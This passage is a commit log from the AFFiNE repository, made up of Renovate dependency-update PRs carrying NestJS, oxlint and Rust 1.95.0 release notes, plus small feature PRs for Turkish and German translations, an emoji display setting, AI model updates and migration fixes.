![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.21/11.1.23?slim=true)
|
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) |
[`11.4.3` →
`11.4.4`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.3/11.4.4)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.4?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.4.3/11.4.4?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.21/11.1.23?slim=true)
|

---

### Release Notes

<details>
<summary>nestjs/graphql (@&#8203;nestjs/apollo)</summary>

###
[`v13.4.2`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.4.2)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.4.1...v13.4.2)

##### v13.4.2 (2026-05-21)

##### Bug fixes

- `graphql`
- [#&#8203;4007](https://redirect.github.com/nestjs/graphql/pull/4007)
fix(graphql): preserve PickType fields for dual-decorated inputs
([@&#8203;yudin-s](https://redirect.github.com/yudin-s))

##### Committers: 1

- Serge Yudin ([@&#8203;yudin-s](https://redirect.github.com/yudin-s))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.23`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.23)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.22...v11.1.23)

##### v11.1.23 (2026-05-21)

##### Bug fixes

- `core`
- [#&#8203;16998](https://redirect.github.com/nestjs/nest/issues/16998)
fix snapshot: true eagerly instantiates Terminus transient indicators
since 11.1.20

##### Committers: 1

- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

###
[`v11.1.22`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.22)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.21...v11.1.22)

##### v11.1.22 (2026-05-21)

##### Bug fixes

- `core`
- [#&#8203;16993](https://redirect.github.com/nestjs/nest/pull/16993)
fix(core): inflight request injection bug
[#&#8203;16989](https://redirect.github.com/nestjs/nest/issues/16989)
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Enhancements

- `core`
- [#&#8203;16967](https://redirect.github.com/nestjs/nest/pull/16967)
fix(core): identify decorator type in invalid-class-module error
([@&#8203;HarrierOnChain](https://redirect.github.com/HarrierOnChain))

##### Committers: 2

- Harrier
([@&#8203;HarrierOnChain](https://redirect.github.com/HarrierOnChain))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/swagger (@&#8203;nestjs/swagger)</summary>

###
[`v11.4.4`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.4)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.3...11.4.4)

#### 11.4.4 (2026-05-21)

##### Bug fixes

- [#&#8203;3930](https://redirect.github.com/nestjs/swagger/pull/3930)
fix: top-level nullable with discriminator issue
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Enhancements

- [#&#8203;3921](https://redirect.github.com/nestjs/swagger/pull/3921)
feat(swagger): add summary field to Tag Object (OpenAPI 3.2)
([@&#8203;frbuceta](https://redirect.github.com/frbuceta))
- [#&#8203;3924](https://redirect.github.com/nestjs/swagger/pull/3924)
feat(swagger): warn when
[@&#8203;ApiTags](https://redirect.github.com/ApiTags) receives
hierarchy fields
([@&#8203;frbuceta](https://redirect.github.com/frbuceta))
- [#&#8203;3925](https://redirect.github.com/nestjs/swagger/pull/3925)
fix(swagger): type Tag Object kind as a free-form string
([@&#8203;frbuceta](https://redirect.github.com/frbuceta))

##### Committers: 4

- Alexander Scholz
([@&#8203;LucidityDesign](https://redirect.github.com/LucidityDesign))
- Francisco Buceta
([@&#8203;frbuceta](https://redirect.github.com/frbuceta))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- Natanael dos Santos Feitosa
([@&#8203;natanfeitosa](https://redirect.github.com/natanfeitosa))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-24 19:28:10 +08:00
DarkSky 6d1172ba44 chore: bump deps 2026-05-24 07:13:16 +08:00
DarkSky 2aa56cbccd chore: bump toolchain & fix lint 2026-05-24 06:47:17 +08:00
renovate[bot] adfa51a372 chore: bump up oxlint version to v1.66.0 (#14974)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint](https://oxc.rs/docs/guide/usage/linter)
([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint))
| [`1.58.0` →
`1.66.0`](https://renovatebot.com/diffs/npm/oxlint/1.58.0/1.66.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint/1.66.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint/1.58.0/1.66.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/oxc (oxlint)</summary>

###
[`v1.66.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1660---2026-05-18)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.65.0...oxlint_v1.66.0)

##### 🚀 Features

-
[`0440b0f`](https://redirect.github.com/oxc-project/oxc/commit/0440b0f)
linter/eslint: Implement `id-match` rule
([#&#8203;22379](https://redirect.github.com/oxc-project/oxc/issues/22379))
(Vladislav Sayapin)
-
[`65bf119`](https://redirect.github.com/oxc-project/oxc/commit/65bf119)
linter: Implement react no-object-type-as-default-prop
([#&#8203;22481](https://redirect.github.com/oxc-project/oxc/issues/22481))
(uhyo)
-
[`2a6ddce`](https://redirect.github.com/oxc-project/oxc/commit/2a6ddce)
linter/eslint: Implement `no-implied-eval` rule
([#&#8203;22391](https://redirect.github.com/oxc-project/oxc/issues/22391))
(Vladislav Sayapin)
-
[`625758a`](https://redirect.github.com/oxc-project/oxc/commit/625758a)
linter/vitest: Implement padding-around-after-all-blocks rule
([#&#8203;21788](https://redirect.github.com/oxc-project/oxc/issues/21788))
(kapobajza)
-
[`37680b0`](https://redirect.github.com/oxc-project/oxc/commit/37680b0)
linter: Implement react no-unstable-nested-components
([#&#8203;22248](https://redirect.github.com/oxc-project/oxc/issues/22248))
(Jovi De Croock)
-
[`d8d9c74`](https://redirect.github.com/oxc-project/oxc/commit/d8d9c74)
linter: Implement import/newline-after-import rule
([#&#8203;19142](https://redirect.github.com/oxc-project/oxc/issues/19142))
(Ryuya Yanagi)

###
[`v1.65.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1650---2026-05-15)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.64.0...oxlint_v1.65.0)

##### 🚀 Features

-
[`5478fb5`](https://redirect.github.com/oxc-project/oxc/commit/5478fb5)
linter/jsdoc: Implement `require-throws-description` rule
([#&#8203;22386](https://redirect.github.com/oxc-project/oxc/issues/22386))
(Mikhail Baev)
-
[`c73225e`](https://redirect.github.com/oxc-project/oxc/commit/c73225e)
linter/eslint: Implement `prefer-arrow-callback` rule
([#&#8203;22312](https://redirect.github.com/oxc-project/oxc/issues/22312))
(박천(Cheon Park))
-
[`de82b59`](https://redirect.github.com/oxc-project/oxc/commit/de82b59)
linter: Add support for `eslint-plugin-jsx-a11y-x`
([#&#8203;22356](https://redirect.github.com/oxc-project/oxc/issues/22356))
(mehm8128)
-
[`f44b6c8`](https://redirect.github.com/oxc-project/oxc/commit/f44b6c8)
linter: Fill schemas `DummyRuleMap` with built-in rules
([#&#8203;22288](https://redirect.github.com/oxc-project/oxc/issues/22288))
(Sysix)

###
[`v1.64.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1640---2026-05-11)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.63.0...oxlint_v1.64.0)

##### 🚀 Features

-
[`fbb8f22`](https://redirect.github.com/oxc-project/oxc/commit/fbb8f22)
linter: Support `ignores` in overrides
([#&#8203;22148](https://redirect.github.com/oxc-project/oxc/issues/22148))
(camc314)

##### 🐛 Bug Fixes

-
[`25b7017`](https://redirect.github.com/oxc-project/oxc/commit/25b7017)
linter: Undocument override `ignores` option
([#&#8203;22213](https://redirect.github.com/oxc-project/oxc/issues/22213))
(camc314)

###
[`v1.63.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1630---2026-05-05)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.62.0...oxlint_v1.63.0)

##### 📚 Documentation

-
[`cacbc4a`](https://redirect.github.com/oxc-project/oxc/commit/cacbc4a)
linter: Fix jest settings docs.
([#&#8203;22127](https://redirect.github.com/oxc-project/oxc/issues/22127))
(connorshea)

###
[`v1.62.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1620---2026-04-27)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/7a75f0d0555ee8e5012874eeb3f06f7272804e37...oxlint_v1.62.0)

##### 🚀 Features

-
[`348f46c`](https://redirect.github.com/oxc-project/oxc/commit/348f46c)
linter: Add `respectEslintDisableDirectives` option
([#&#8203;21384](https://redirect.github.com/oxc-project/oxc/issues/21384))
(Christian Vuerings)

##### 🐛 Bug Fixes

-
[`8c425db`](https://redirect.github.com/oxc-project/oxc/commit/8c425db)
linter: Allow string for jest version in config schema
([#&#8203;21649](https://redirect.github.com/oxc-project/oxc/issues/21649))
(camc314)

###
[`v1.61.1`](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.61.0...7a75f0d0555ee8e5012874eeb3f06f7272804e37)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.61.0...7a75f0d0555ee8e5012874eeb3f06f7272804e37)

###
[`v1.61.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1610---2026-04-20)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.60.0...oxlint_v1.61.0)

##### 🚀 Features

-
[`38d8090`](https://redirect.github.com/oxc-project/oxc/commit/38d8090)
linter/jest: Implemented jest `version` settings in config file.
([#&#8203;21522](https://redirect.github.com/oxc-project/oxc/issues/21522))
(Said Atrahouch)

###
[`v1.60.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1600---2026-04-13)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.59.0...oxlint_v1.60.0)

##### 📚 Documentation

-
[`cfd8a4f`](https://redirect.github.com/oxc-project/oxc/commit/cfd8a4f)
linter: Don't rely on old eslint doc for available globals
([#&#8203;21334](https://redirect.github.com/oxc-project/oxc/issues/21334))
(Nicolas Le Cam)

### `v1.59.0`

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.58.0...oxlint_v1.59.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-24 06:30:01 +08:00
renovate[bot] 4f0d9aff30 chore: bump up rustc version to v1.95.0 (#15009)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [rustc](https://redirect.github.com/rust-lang/rust) | minor | `1.94.0`
→ `1.95.0` |

---

### Release Notes

<details>
<summary>rust-lang/rust (rustc)</summary>

###
[`v1.95.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1950-2026-04-16)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.94.1...1.95.0)

<a id="1.95-Language"></a>

## Language

- [Stabilize `if let` guards on match
arms](https://redirect.github.com/rust-lang/rust/pull/141295)
- [`irrefutable_let_patterns` lint no longer lints on let
chains](https://redirect.github.com/rust-lang/rust/pull/146832)
- [Support importing path-segment keywords with
renaming](https://redirect.github.com/rust-lang/rust/pull/146972)
- [Stabilize inline assembly for PowerPC and
PowerPC64](https://redirect.github.com/rust-lang/rust/pull/147996)
- [const-eval: be more consistent in the behavior of padding during
typed copies](https://redirect.github.com/rust-lang/rust/pull/148967)
- [Const blocks are no longer evaluated to determine if expressions
involving fallible operations can implicitly be
constant-promoted.](https://redirect.github.com/rust-lang/rust/pull/150557).
Expressions whose ability to implicitly be promoted would depend on the
result of a const block are no longer implicitly promoted.
- [Make operational semantics of pattern matching independent of crate
and module](https://redirect.github.com/rust-lang/rust/pull/150681)

<a id="1.95-Compiler"></a>

## Compiler

- [Stabilize `--remap-path-scope` for controlling the scoping of how
paths get remapped in the resulting
binary](https://redirect.github.com/rust-lang/rust/pull/147611)
- [Apply patches for CVE-2026-6042 and CVE-2026-40200 to vendored
musl](https://redirect.github.com/rust-lang/rust/pull/155171)

<a id="1.95-Platform-Support"></a>

## Platform Support

- [Promote `powerpc64-unknown-linux-musl` to Tier 2 with host
tools](https://redirect.github.com/rust-lang/rust/pull/149962)
- [Promote `aarch64-apple-tvos` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-tvos-sim` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-watchos` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-watchos-sim` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-visionos` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-visionos-sim` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)

Refer to Rust's [platform support page][platform-support-doc]
for more information on Rust's tiered platform support.

[platform-support-doc]:
https://doc.rust-lang.org/rustc/platform-support.html

<a id="1.95-Libraries"></a>

## Libraries

- [`thread::scope`: document how join interacts with TLS
destructors](https://redirect.github.com/rust-lang/rust/pull/149482)
- [Speed up `str::contains` on aarch64 targets with `neon` target
feature enabled by
default](https://redirect.github.com/rust-lang/rust/pull/152176)

<a id="1.95-Stabilized-APIs"></a>

## Stabilized APIs

- [`MaybeUninit<[T; N]>: From<[MaybeUninit<T>;
N]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-From%3CMaybeUninit%3C%5BT;+N%5D%3E%3E-for-%5BMaybeUninit%3CT%3E;+N%5D)
- [`MaybeUninit<[T; N]>: AsRef<[MaybeUninit<T>;
N]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsRef%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`MaybeUninit<[T; N]>:
AsRef<[MaybeUninit<T>]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsRef%3C%5BMaybeUninit%3CT%3E%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`MaybeUninit<[T; N]>: AsMut<[MaybeUninit<T>;
N]>`](https://doc.rust-lang.org/beta/std/mem/union.MaybeUninit.html#impl-AsMut%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`MaybeUninit<[T; N]>:
AsMut<[MaybeUninit<T>]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsMut%3C%5BMaybeUninit%3CT%3E%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`[MaybeUninit<T>; N]: From<MaybeUninit<[T;
N]>>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-From%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`Cell<[T; N]>: AsRef<[Cell<T>;
N]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E;+N%5D%3E-for-Cell%3C%5BT;+N%5D%3E)
- [`Cell<[T; N]>:
AsRef<[Cell<T>]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E%5D%3E-for-Cell%3C%5BT;+N%5D%3E)
- [`Cell<[T]>:
AsRef<[Cell<T>]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E%5D%3E-for-Cell%3C%5BT%5D%3E)
- [`bool:
TryFrom<{integer}>`](https://doc.rust-lang.org/stable/std/primitive.bool.html#impl-TryFrom%3Cu128%3E-for-bool)
-
[`AtomicPtr::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicPtr.html#method.update)
-
[`AtomicPtr::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicPtr.html#method.try_update)
-
[`AtomicBool::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicBool.html#method.update)
-
[`AtomicBool::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicBool.html#method.try_update)
-
[`AtomicIn::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicIsize.html#method.update)
-
[`AtomicIn::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicIsize.html#method.try_update)
-
[`AtomicUn::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicUsize.html#method.update)
-
[`AtomicUn::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicUsize.html#method.try_update)
-
[`cfg_select!`](https://doc.rust-lang.org/stable/std/macro.cfg_select.html)
- [`mod
core::range`](https://doc.rust-lang.org/stable/core/range/index.html)
-
[`core::range::RangeInclusive`](https://doc.rust-lang.org/stable/core/range/struct.RangeInclusive.html)
-
[`core::range::RangeInclusiveIter`](https://doc.rust-lang.org/stable/core/range/struct.RangeInclusiveIter.html)
-
[`core::hint::cold_path`](https://doc.rust-lang.org/stable/core/hint/fn.cold_path.html)
- [`<*const
T>::as_ref_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_ref_unchecked)
- [`<*mut
T>::as_ref_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_ref_unchecked-1)
- [`<*mut
T>::as_mut_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_mut_unchecked)
-
[`Vec::push_mut`](https://doc.rust-lang.org/stable/std/vec/struct.Vec.html#method.push_mut)
-
[`Vec::insert_mut`](https://doc.rust-lang.org/stable/std/vec/struct.Vec.html#method.insert_mut)
-
[`VecDeque::push_front_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.push_front_mut)
-
[`VecDeque::push_back_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.push_back_mut)
-
[`VecDeque::insert_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.insert_mut)
-
[`LinkedList::push_front_mut`](https://doc.rust-lang.org/stable/std/collections/struct.LinkedList.html#method.push_front_mut)
-
[`LinkedList::push_back_mut`](https://doc.rust-lang.org/stable/std/collections/struct.LinkedList.html#method.push_back_mut)
-
[`Layout::dangling_ptr`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.dangling_ptr)
-
[`Layout::repeat`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.repeat)
-
[`Layout::repeat_packed`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.repeat_packed)
-
[`Layout::extend_packed`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.extend_packed)

These previously stable APIs are now stable in const contexts:

-
[`fmt::from_fn`](https://doc.rust-lang.org/stable/std/fmt/fn.from_fn.html)
-
[`ControlFlow::is_break`](https://doc.rust-lang.org/stable/core/ops/enum.ControlFlow.html#method.is_break)
-
[`ControlFlow::is_continue`](https://doc.rust-lang.org/stable/core/ops/enum.ControlFlow.html#method.is_continue)

<a id="1.95-Rustdoc"></a>

## Rustdoc

- [In search results, rank unstable items
lower](https://redirect.github.com/rust-lang/rust/pull/149460)
- [Add new "hide deprecated items" setting in
rustdoc](https://redirect.github.com/rust-lang/rust/pull/151091)

<a id="1.95-Compatibility-Notes"></a>

## Compatibility Notes

- [Array coercions may now result in less inference constraints than
before](https://redirect.github.com/rust-lang/rust/pull/140283)
- Importing `$crate` without renaming, i.e. `use $crate::{self};`, is
now no longer permitted due to stricter error checking for `self`
imports.
- [const-eval: be more consistent in the behavior of padding during
typed copies.](https://redirect.github.com/rust-lang/rust/pull/148967)
In very rare cases, this may cause compilation errors due to bytes from
parts of a pointer ending up in the padding bytes of a `const` or
`static`.
- [A future-incompatibility warning lint
`ambiguous_glob_imported_traits` is now reported when using an
ambiguously glob imported
trait](https://redirect.github.com/rust-lang/rust/pull/149058)
- [Check lifetime bounds of types mentioning only type
parameters](https://redirect.github.com/rust-lang/rust/pull/149389)
- [Report more visibility-related ambiguous import
errors](https://redirect.github.com/rust-lang/rust/pull/149596)
- [Deprecate `Eq::assert_receiver_is_total_eq` and emit future
compatibility warnings on manual
impls](https://redirect.github.com/rust-lang/rust/pull/149978)
- [powerpc64: Use the ELF ABI version set in target spec instead of
guessing](https://redirect.github.com/rust-lang/rust/pull/150468) (fixes
the ELF ABI used by the OpenBSD target)
- Matching on a `#[non_exhaustive]` enum [now reads the discriminant,
even if the enum has only one
variant](https://redirect.github.com/rust-lang/rust/pull/150681). This
can cause closures to capture values that they previously wouldn't.
- `mut ref` and `mut ref mut` patterns, part of the unstable [Match
Ergonomics 2024
RFC](https://redirect.github.com/rust-lang/rust/issues/123076), were
accidentally allowed on stable within struct pattern field shorthand.
These patterns are now correctly feature-gated as unstable in this
position.
- [Add future-compatibility warning for derive helper attributes which
conflict with built-in
attributes](https://redirect.github.com/rust-lang/rust/pull/151152)
- [JSON target
specs](https://doc.rust-lang.org/rustc/targets/custom.html) have been
destabilized and now require `-Z unstable-options` to use. Previously,
they could not be used without the standard library, which has no stable
build mechanism. In preparation for the `build-std` project adding that
support, JSON target specs are being proactively gated to ensure they
remain unstable even if `build-std` is stabilized. Cargo now includes
the `-Z json-target-spec` CLI flag to automatically pass `-Z
unstable-options` to the compiler when needed. See
[#&#8203;150151](https://redirect.github.com/rust-lang/rust/pull/150151),
[#&#8203;151534](https://redirect.github.com/rust-lang/rust/pull/150151),
and
[rust-lang/cargo#16557](https://redirect.github.com/rust-lang/cargo/pull/16557).
- [The arguments of `#[feature]` attributes on invalid targets are now
checked](https://redirect.github.com/rust-lang/rust/issues/153764)

<a id="1.95-Internal-Changes"></a>

## Internal Changes

These changes do not affect any public interfaces of Rust, but they
represent significant improvements to the performance or internals of
rustc and related tools.

- [Update to LLVM
22](https://redirect.github.com/rust-lang/rust/pull/150722)

###
[`v1.94.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1941-2026-03-26)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.94.0...1.94.1)

<a id="1.94.1"></a>

- [Fix `std::thread::spawn` on
wasm32-wasip1-threads](https://redirect.github.com/rust-lang/rust/pull/153634)
- [Remove new methods added to
`std::os::windows::fs::OpenOptionsExt`](https://redirect.github.com/rust-lang/rust/pull/153491)
  The new methods were unstable, but the trait itself is not sealed and so
  cannot be extended with non-default methods.
- [Clippy: fix ICE in
`match_same_arms`](https://redirect.github.com/rust-lang/rust-clippy/pull/16685)
- [Cargo: update tar to
0.4.45](https://redirect.github.com/rust-lang/cargo/pull/16769)
  This resolves CVE-2026-33055 and CVE-2026-33056. Users of crates.io are
  not affected.
  See [blog](https://blog.rust-lang.org/2026/03/21/cve-2026-33056/) for
  more details.

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-24 06:29:05 +08:00
SkyLostTR eecd0a2169 feat(i18n): add Turkish translation (#15000)
This pull request introduces support for the Turkish language to the
frontend internationalization system and adds a new pull request
template to standardize PR descriptions. The main changes are grouped
below:

**Internationalization: Turkish Language Support**
* Added `'tr'` (Turkish) to the `Language` type and
`SUPPORTED_LANGUAGES` object in `index.ts`, including its display name,
native name, flag emoji, and resource loader.
* Updated `i18n-completenesses.json` to include Turkish (`"tr": 6`).

## Summary by CodeRabbit

* **New Features**
  * Turkish language can now be selected in the app.

* **Localization**
  * Initial Turkish translations added and translation completeness set to
    100%.
  * Locale metadata added (display name, original name, flag) for Turkish.

2026-05-24 06:19:06 +08:00
steffenrapp f2980503b4 fix(editor): sorting of page emoji display toggle (#15020)
Fixes the order of the new setting toggle introduced in #14999.
It appeared between "Auto-title new docs with current date" and "New doc
date format" which both belong together.

## Summary by CodeRabbit

* **Style**
  * Repositioned the "display add icon option" setting within General
    settings for improved interface organization and logical grouping.

2026-05-24 00:06:21 +08:00
steffenrapp 925c95ce88 feat(i18n): update German translation (#15011)
## Summary by CodeRabbit

* **Localization**
  * German language completeness raised to 100%.
  * Added German translations for Markdown export/copy labels and success
    text, import formats (including Bear backup and Word .docx), editor
    settings (auto-date-title formats, add-icon option), AI BYOK
    workspace/provider-key UI and notifications, and a recording/importing
    UI prompt.

2026-05-22 01:33:38 +08:00
DarkSky 3098b3b14b feat(server): bump models (#15013)
#### PR Dependency Tree


* **PR #15013** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
  * Expanded AI capabilities with the addition of Gemini 3.5 Flash model,
    providing enhanced options for AI-powered features.

* **Updates**
  * Updated Claude Sonnet to the latest version for improved performance.
  * Refreshed pro models configuration with optimized selections.

2026-05-21 15:29:00 +08:00
DarkSky dd1cd77ca0 chore(server): improve migration compatibility (#15014)
#### PR Dependency Tree


* **PR #15014** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Bug Fixes**
  * Remove orphaned legacy subscription and entitlement records during
    backfill.
  * Repair workspaces missing active owners by promoting eligible members
    and cleaning up empty workspaces.
  * Skip cloud subscription backfill when target user/workspace no longer
    exists to avoid dangling data.

* **Tests**
  * Added tests verifying legacy data cleanup during backfill.
  * Added tests verifying workspace ownership repair and migration
    behavior.

2026-05-21 15:28:51 +08:00
Waqar Bin zafar d20dbfd6a2 feat(editor): add page emoji display toggle #14987 (#14999)
This PR adds a display toggle for Page Emoji, so users can choose
whether the add emoji option is shown in the page header when no emoji
is set.

What changed
- read editor setting for display add icon option
- hide emoji placeholder entry when the setting is disabled
- keep existing behavior for readonly mode and for pages that already have
  an emoji

Why
This implements the feature request to control Page Emoji visibility and
improves header cleanliness for users who prefer a minimal UI.

Issue
Closes #14093
<img width="1277" height="726" alt="Screenshot 2026-05-19 at 3 44 14 PM"
src="https://github.com/user-attachments/assets/caa29272-35c0-410d-bd54-2e038e4e0db2"
/>
<img width="1511" height="779" alt="Screenshot 2026-05-19 at 3 44 35 PM"
src="https://github.com/user-attachments/assets/3504136a-d34c-45cc-992b-0056b018ff92"
/>

Testing
- verified in editable mode:
  - setting ON: add emoji placeholder is visible when page has no emoji
  - setting OFF: add emoji placeholder is hidden when page has no emoji
- verified in readonly mode:
  - no emoji: nothing shown
  - with emoji: existing emoji is shown
- verified no regression for selecting/changing/removing emoji

Screenshots
I will attach screenshots in this section.

Quick rule checks before submit
- Base branch is canary.
- PR title follows conventional format: type(scope): subject.
- Scope editor is valid for this repo.
- Include Closes #14093 in the body.
- Add your screenshots before creating or right after opening the PR.

## Summary by CodeRabbit

* **New Features**
  * Added an editor setting to toggle whether the "add icon" option is
    shown when creating new documents (default: enabled).
* **User Experience**
  * When disabled, the add-icon trigger is hidden for documents that use a
